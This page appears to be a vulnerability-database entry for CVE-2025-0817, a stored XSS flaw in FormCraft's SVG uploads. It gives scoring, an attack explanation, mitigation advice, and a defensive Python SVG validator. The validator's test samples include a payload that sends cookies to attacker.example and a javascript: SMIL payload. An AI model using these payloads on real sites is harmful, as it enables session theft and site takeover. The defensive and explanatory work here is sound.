Cyber Posture

CVE-2025-0817

Severity: High
Published: 18 February 2025
Modified: 21 February 2025
KEV Added:
Patch:
CVSS Score: 7.2 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N)
EPSS Score: 0.0053 (67.5th percentile)
Risk Priority: 15 (weighted 60% EPSS, 20% KEV, 20% CVSS)

Description

The FormCraft plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 3.9.11 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.

Security Summary

CVE-2025-0817 is a stored cross-site scripting (XSS) vulnerability, classified under CWE-79, in the FormCraft plugin for WordPress. It affects all versions up to and including 3.9.11 and stems from insufficient input sanitization and output escaping of SVG file uploads: the plugin does not strip or neutralize script content in an uploaded SVG, so whoever opens the stored file in a browser runs that script. The vulnerability carries a CVSS v3.1 base score of 7.2 (AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N): the upload is reachable over the network with low complexity and without privileges or user interaction, the scope changes because the script executes in the victim's browser rather than in the plugin itself, and the direct confidentiality and integrity impacts are rated low.

An unauthenticated attacker exploits CVE-2025-0817 remotely by submitting a form that includes an SVG file carrying an XSS payload (a <script> element, an onload or similar event attribute, or a javascript: href). Once stored, the script runs in the browser of anyone who opens the SVG file directly, which an attacker would typically bring about by sending a site administrator the upload's URL; browsers do not execute scripts in an SVG referenced from an <img> tag, so the file has to be navigated to as a document. In the victim's session the script can steal cookies or tokens, read data, or perform authenticated actions, and an administrator victim gives the attacker a path to full site compromise.
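The following validator is an added example, not code from this page or from the FormCraft plugin. It shows the upload-time check that blocks the class of payload described above: the SVG is parsed as XML and rejected if it contains the constructs that execute script when a browser opens the file directly (script and foreign-content elements, on* event attributes, javascript:/data: hrefs, and SMIL animations that rewrite an href). The three sample SVGs are constructed for the example, and the function names svg_findings, is_safe_svg and scan_directory are the example's own.

```python
import os
import re
import xml.etree.ElementTree as ET
from typing import Dict, List

# Elements that execute script or embed active/foreign content when an SVG is
# opened directly in a browser tab (the attack vector described above).
DANGEROUS_TAGS = {"script", "foreignobject", "iframe", "embed", "object", "handler"}
# SMIL animation elements can rewrite attributes such as href at render time.
ANIMATION_TAGS = {"set", "animate", "animatemotion", "animatetransform"}
# Any on* attribute (onload, onclick, onerror, ...) is an inline event handler.
EVENT_ATTR = re.compile(r"^on[a-z]+$", re.IGNORECASE)
# URI schemes that execute or smuggle content instead of referencing a file.
ACTIVE_URI = re.compile(r"^\s*(javascript|vbscript|data)\s*:", re.IGNORECASE)
# Attributes whose value is (or can become) a URI the browser will follow.
URI_ATTRS = {"href", "to", "from", "values"}


def _local(name: str) -> str:
    """Drop the {namespace} prefix ElementTree puts on tags and attributes; lowercase."""
    return name.rsplit("}", 1)[-1].lower()


def svg_findings(svg_bytes: bytes) -> List[str]:
    """Return the reasons an SVG upload should be rejected; an empty list means none.

    Fails closed: anything that does not parse as XML with an <svg> root is rejected.
    ElementTree does not resolve external entities, so the parse itself is not an XXE risk.
    """
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        return [f"unparseable XML: {exc}"]
    if _local(root.tag) != "svg":
        return [f"root element is <{_local(root.tag)}>, not <svg>"]

    findings: List[str] = []
    for el in root.iter():
        tag = _local(el.tag)
        if tag in DANGEROUS_TAGS:
            findings.append(f"<{tag}> element")
        if tag in ANIMATION_TAGS and el.get("attributeName", "").lower().endswith("href"):
            findings.append(f"<{tag}> animating an href attribute")
        for attr, value in el.attrib.items():
            name = _local(attr)
            if EVENT_ATTR.match(name):
                findings.append(f"event handler attribute {name} on <{tag}>")
            elif name in URI_ATTRS and ACTIVE_URI.match(value):
                findings.append(f"active URI scheme in {name} on <{tag}>")
    return findings


def is_safe_svg(svg_bytes: bytes) -> bool:
    """True when the upload produced no findings."""
    return not svg_findings(svg_bytes)


def scan_directory(root_dir: str) -> Dict[str, List[str]]:
    """Walk an uploads tree (for example wp-content/uploads) and report every .svg with findings."""
    report: Dict[str, List[str]] = {}
    for dirpath, _dirs, files in os.walk(root_dir):
        for fname in files:
            if not fname.lower().endswith(".svg"):
                continue
            path = os.path.join(dirpath, fname)
            with open(path, "rb") as fh:
                found = svg_findings(fh.read())
            if found:
                report[os.path.relpath(path, root_dir)] = found
    return report


# Constructed sample inputs for this example (not real FormCraft uploads).
BENIGN_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">'
              b'<circle cx="5" cy="5" r="4" fill="#09f"/></svg>')
MALICIOUS_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)">'
                 b'<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
                 b'</svg>')
SMIL_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
            b'<a><set attributeName="xlink:href" to="javascript:alert(1)"/>'
            b'<text y="20">click me</text></a></svg>')

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_SVG), ("malicious", MALICIOUS_SVG), ("smil", SMIL_SVG)):
        print(label, "->", svg_findings(sample) or "no findings")
```

A check like this is defence in depth at the upload boundary; it does not replace updating the plugin, and because it rejects rather than rewrites, it is deliberately stricter than an SVG sanitizer that tries to keep the image usable. Running scan_directory over an existing uploads tree is the quickest way to find files that were accepted before the fix.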

Advisories and patch information are referenced in the FormCraft changelog at https://formcraft-wp.com/changelog/, the plugin's CodeCanyon product page at https://codecanyon.net/item/formcraft-premium-wordpress-form-builder/5335056, and Wordfence's threat intelligence report at https://www.wordfence.com/threat-intel/vulnerabilities/id/7ae0710a-8c9b-41b0-860f-ae79b7ed1ee4?source=cve. Review these sources for the fixed release and update to a version later than 3.9.11. Until the update is applied, prevent the form from accepting SVG uploads, or serve the uploads directory with a Content-Security-Policy header that disallows script (for example script-src 'none'), which stops a directly opened SVG from executing its embedded script.

Details

CWE(s)
CWE-79

Affected Products

ncrafts
formcraft
≤ 3.9.12 (the description above states all versions up to and including 3.9.11; confirm the affected range against the vendor changelog before closing a finding)
